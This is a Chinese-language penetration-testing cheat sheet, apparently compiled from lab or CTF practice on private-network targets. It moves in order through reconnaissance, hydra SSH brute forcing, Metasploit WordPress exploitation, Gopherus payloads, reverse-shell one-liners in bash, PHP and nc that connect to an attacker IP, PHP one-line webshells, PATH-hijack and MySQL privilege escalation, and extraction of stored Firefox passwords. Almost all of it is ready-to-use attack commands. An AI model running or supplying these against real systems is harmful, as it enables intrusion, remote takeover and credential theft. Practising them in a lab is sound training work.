一、信息收集
1. 查看同网段所有主机
arp-scan -l
2. nmap扫描
nmap -A -T4 -p- 192.168.15.134
3. 目录扫描
dirsearch -u http://192.168.15.134/
ffuf -u http://192.168.15.134/FUZZ -w /home/kali/fuzz.txt(字典) -c -ic -e .asp,.php,.html,.txt
4. 站点扫描
wpscan -u http://deathnote.vuln/wordpress -e u
wpscan --api-token=获取到的免费api-token --url=http://192.168.15.135/blog -e p --plugins-detection aggressive
joomscan -u http://192.168.15.134/joomla
二、爆破
1. hydra
hydra -L user.txt(用户名字典) -P notes.txt(密码字典) ssh://192.168.15.130
三、漏洞利用
1. msf工具
msfconsole #启动msf
search file manager wordpress #查找漏洞相关exp
use 1 #使用第1个exp
show options #查看需要设置的参数
set RHOSTS 192.168.15.135 #设置靶机IP
set TARGETURI /blog #设置路径
set LHOST 192.168.15.131 #设置攻击IP
run #启动攻击
/bin/bash -i #升级shell
2. gopherus工具
Gopherus工具是用来专门生成gopher协议的payload工具,通过gopher协议的以及各种被攻击应用的tcp包特点来构造payload
目前支持生成payload应用有:
- MySQL (Port:3306)
- FastCGI (Port:9000)
- Memcached (Port:11211)
- Redis (Port:6379)
- Zabbix (Port:10050)
- SMTP (Port:25)
#安装gopherus工具
git clone https://github.com/tarunkant/Gopherus.git
#进入gopherus工具目录
cd Gopherus
#使用
./gopherus.py --exploit mysql
3. searchsploit查找插件漏洞
searchsploit 插件
payload路径
/usr/share/exploitdb/exploits/
四、反弹shell
1. 反弹shell
bash -i >&/dev/tcp/192.168.15.131/6666 0>1&
2. php反弹shell
<?php $sock=fsockopen("192.168.15.131",7777);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
<?php system($_GET['shell']); ?>
3. nc反弹shell
nc -e /bin/bash 192.168.15.137 7777
4. nc开启监听
nc -lnvp 7777(端口号)
5. 升级shell交互式
python3 -c 'import pty;pty.spawn("/bin/bash")'
五、Webshell管理工具
1. 一句话木马
<?php eval($_REQUEST[password]); ?>
2. 蚁剑
#下载蚁剑
https://github.com/AntSwordProject
#解压蚁剑加载器压缩包
unzip AntSword-Loader-v4.0.3-linux-x64
#解压蚁剑源码压缩包
unzip antSword-master
#进入蚁剑加载器目录
cd AntSword-Loader-v4.0.3-linux-x64
#启动加载器
./AntSword
六、提权
1. 使用PATH变量
find / -perm -4000 -type f 2>/dev/null
strings 可执行文件
cd /tmp
echo "/bin/sh" > 调用命令
chmod 777 调用命令
export PATH=/tmp:$PATH
echo $PATH
/opt/statuscheck
whoami
2. Mysql提权
sudo -u root mysql -e '\! /bin/bash'
七、文件分析工具
1. strace工具检查文件运行过程
strace ./reset_root(文件名)
八、其他工具
1. MD5生成
echo -n "password" |md5sum
#生成的MD5:5f4dcc3b5aa765d61d8327deb882cf99
2. 生成SSH密钥对
ssh-keygen
3. firefox_decrypt提取工具
#下载firefox_decrypt工具
git clone https://github.com/unode/firefox_decrypt.git
#进入工具目录
cd firefox_decrypt
#使用工具
python3 firefox_decrypt.py /root/.mozilla/firefox
4. 端口转发
ssh -Nf -L 9999:127.0.0.1:8080 aeolus@192.168.15.138
5. smbclient工具
smbclient -L 192.168.15.138